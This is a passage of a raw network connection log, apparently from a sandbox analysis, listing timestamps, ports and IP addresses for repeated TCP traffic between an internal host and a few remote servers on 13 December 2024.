Dec 13, 2024 18:53:55.846451044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.846491098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.847369909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.847417116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.847496986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.847542048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.848408937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.848448038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.848507881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.848565102 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.849400043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.849443913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.849473953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.849514961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.850440025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.850481033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.850558996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.850598097 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.851397038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.851449966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.851509094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.851553917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.852431059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.852478027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.852560043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.852601051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.853530884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.853580952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.853737116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.853782892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.854481936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.854533911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.854566097 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.854612112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.855489969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.855535030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.855638981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.855676889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.856481075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.856529951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.856589079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.856642962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.857564926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.857613087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.857700109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.857745886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.858549118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.858597994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.858669996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.858714104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.859523058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.859563112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.859704018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.859754086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.860501051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.860548973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.860721111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.860768080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.861591101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.861634970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.861713886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.861759901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.862623930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.862680912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.862725973 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.862782001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.863656044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.863712072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.863799095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.863846064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.864589930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.864639044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.864667892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.864722013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.865601063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.865645885 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.865726948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.865772009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.866643906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.866695881 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.866753101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.866792917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.867640018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.867686033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.867739916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.867788076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.868647099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.868695974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.868779898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.868932009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.869661093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.869709969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.869777918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.869823933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.870874882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.870918989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.870950937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.870996952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.871716976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.871757030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.871939898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.872010946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.872710943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.872761965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.872798920 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.872847080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.873843908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.873903990 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.874319077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.874368906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.874748945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.874800920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.874896049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.874943972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.875813007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.875864029 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.875895977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.875943899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.876754045 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.876804113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.876877069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.876924038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.877768040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.877814054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.877877951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.877917051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.878808022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.878854036 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.878901005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.878947020 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.879935980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.879981995 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.879982948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.880023956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.880845070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.880901098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.881027937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.881074905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.881824017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.881875992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.881942034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.881989002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.882884979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.882934093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.958050966 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:55.958153963 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:55.959053993 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:55.959064960 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:55.960514069 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:55.960525036 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:55.985418081 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:56.021888971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.022059917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.022072077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.022121906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.022300005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.022350073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.022418976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.022459030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.023361921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.023411989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.023461103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.023502111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.024311066 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.024357080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.024414062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.024456024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.025352955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.025396109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.025445938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.025490046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.026349068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.026408911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.026443958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.026487112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.027374029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.027429104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.027446985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.027492046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.028378963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.028426886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.028462887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.028508902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.029393911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.029438019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.029508114 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.029548883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.030417919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.030462027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.030524015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.030565977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.031419039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.031469107 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.031512022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.031560898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.032444000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.032489061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.032556057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.032610893 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.033437967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.033485889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.033519030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.033560991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.034450054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.034506083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.034606934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.034656048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.035490990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.035547018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.035593033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.035641909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.036473036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.036528111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.036561012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.036608934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.037491083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.037544012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.037580967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.037631035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.038506031 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.038552999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.038620949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.038667917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.039529085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.039582014 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.039629936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.039674997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.040532112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.040575981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.040648937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.040693998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.041554928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.041599035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.041693926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.041737080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.042601109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.042643070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.042675018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.042716026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.043595076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.043648005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.043682098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.043735027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.044655085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.044701099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.044764996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.044805050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.045656919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.045697927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.045739889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.045785904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.046668053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.046724081 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.046757936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.046804905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.047665119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.047707081 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.047785997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.047825098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.048696995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.048759937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.048799038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.048846960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.049720049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.049767971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.049846888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.049886942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.050806999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.050863028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.050966978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.051008940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.051769972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.051820993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.051942110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.051985025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.052871943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.052989960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.053008080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.053030968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.054119110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.054167986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.054217100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.054258108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.056037903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.056055069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.056087017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.056117058 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.056139946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.056184053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.056195974 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.056242943 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.057046890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.057099104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.057136059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.057178020 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.058202028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.058245897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.058254004 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.058295012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.058887959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.058943987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.059025049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.059067965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.059906960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.059950113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.060034990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.060081005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.060959101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.061012030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.061034918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.061079025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.061947107 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.061992884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.062016964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.062056065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.062920094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.062969923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.063000917 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.063050032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.063935995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.063981056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.063999891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.064042091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.064996958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.065046072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.065066099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.065114975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.066003084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.066050053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.066087008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.066128016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.066999912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.067051888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.067102909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.067153931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.067955017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.068001032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.068022966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.068063974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.068943977 CET	80	49917	31.41.244.11	192.168.2.7
